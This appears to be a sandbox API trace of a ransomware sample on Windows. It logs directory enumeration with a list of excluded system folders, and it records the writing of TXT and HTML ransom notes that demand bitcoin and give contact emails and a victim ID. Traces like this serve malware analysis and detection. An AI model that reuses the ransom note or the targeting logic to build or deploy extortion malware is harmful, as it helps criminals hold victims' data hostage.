	[0168.687] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="winnt") returned 0x0
	[0168.687] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.687] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="tmp") returned 0x0
	[0168.687] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.687] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="cache") returned 0x0
	[0168.688] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.688] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="temporary internet files") returned 0x0
	[0168.688] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.688] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="webcache") returned 0x0
	[0168.688] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.688] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="inetcache") returned 0x0
	[0168.688] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.689] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="nvidia") returned 0x0
	[0168.689] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.689] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="packages") returned 0x0
	[0168.689] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.689] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="cookies") returned 0x0
	[0168.689] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.689] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="programdata") returned 0x0
	[0168.690] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0168.690] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36f2be13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x36f2be13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AutoLogger", cAlternateFileName="AUTOLO~1")) returned 1
	[0168.690] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShutdownLogger", cAlternateFileName="SHUTDO~1")) returned 1
	[0168.690] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShutdownLogger", cAlternateFileName="SHUTDO~1")) returned 0
	[0168.690] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0168.690] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0168.691] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs"
	[0168.691] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\*.*"
	[0168.691] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.691] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.691] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\HELP_DECRYPT_YOUR_FILES.TXT") returned 74
	[0168.692] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0168.693] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0168.693] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0168.695] CloseHandle (hObject=0x388) returned 1
	[0168.696] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0168.702] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.702] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0168.703] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0168.703] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0168.704] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0168.704] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0168.704] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0168.704] CloseHandle (hObject=0x388) returned 1
	[0168.705] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.705] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.705] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0168.705] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\HELP_DECRYPT_YOUR_FILES.HTML") returned 75
	[0168.705] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0168.717] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0168.717] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0168.720] CloseHandle (hObject=0x388) returned 1
	[0168.720] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.721] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0168.721] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.721] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0168.722] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0168.722] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0168.723] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0168.723] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0168.723] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0168.723] CloseHandle (hObject=0x388) returned 1
	[0168.724] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7e184a89, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0168.724] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\*.*") returned 50
	[0168.724] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.724] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\*.*", cchLength=0x32 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*") returned 0x32
	[0168.724] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.725] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="windows") returned 0x0
	[0168.725] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.725] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="boot") returned 0x0
	[0168.725] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.725] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="system volume information") returned 0x0
	[0168.725] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.726] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0168.726] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.726] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="temp") returned 0x0
	[0168.726] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.726] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="program files") returned 0x0
	[0168.726] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.726] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="program files (x86)") returned 0x0
	[0168.726] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.727] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="appdata") returned 0x0
	[0168.727] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.727] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="application data") returned 0x0
	[0168.727] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.727] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="winnt") returned 0x0
	[0168.727] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.728] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="tmp") returned 0x0
	[0168.728] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.778] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="cache") returned 0x0
	[0168.778] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.778] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="temporary internet files") returned 0x0
	[0168.778] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.779] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="webcache") returned 0x0
	[0168.779] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.779] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="inetcache") returned 0x0
	[0168.779] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.779] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="nvidia") returned 0x0
	[0168.779] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.779] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="packages") returned 0x0
	[0168.780] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.780] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="cookies") returned 0x0
	[0168.780] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.780] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="programdata") returned 0x0
	[0168.780] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0168.780] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0168.780] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7e184a89, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0168.781] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0168.781] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36f2be13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x36f2be13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AutoLogger", cAlternateFileName="AUTOLO~1")) returned 1
	[0168.781] lstrcmpW (lpString1="AutoLogger", lpString2="..") returned 1
	[0168.781] lstrcmpW (lpString1="AutoLogger", lpString2=".") returned 1
	[0168.781] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs"
	[0168.781] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\"
	[0168.781] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\", lpString2="AutoLogger" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger"
	[0168.781] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger"
	[0168.782] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\"
	[0168.782] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\"
	[0168.782] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\*.*"
	[0168.782] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc088dfed, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc088dfed, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0168.783] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\*.*") returned 61
	[0168.783] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.783] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\*.*", cchLength=0x3d | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*") returned 0x3d
	[0168.783] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.783] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="windows") returned 0x0
	[0168.783] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.783] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="boot") returned 0x0
	[0168.783] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.784] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="system volume information") returned 0x0
	[0168.784] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.784] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0168.784] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.784] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="temp") returned 0x0
	[0168.784] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.784] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="program files") returned 0x0
	[0168.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.785] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="program files (x86)") returned 0x0
	[0168.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.785] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="appdata") returned 0x0
	[0168.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.785] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="application data") returned 0x0
	[0168.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.786] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="winnt") returned 0x0
	[0168.786] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.786] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="tmp") returned 0x0
	[0168.786] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.786] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="cache") returned 0x0
	[0168.786] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.786] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="temporary internet files") returned 0x0
	[0168.786] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.787] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="webcache") returned 0x0
	[0168.787] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.787] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="inetcache") returned 0x0
	[0168.787] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.787] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="nvidia") returned 0x0
	[0168.787] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.787] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="packages") returned 0x0
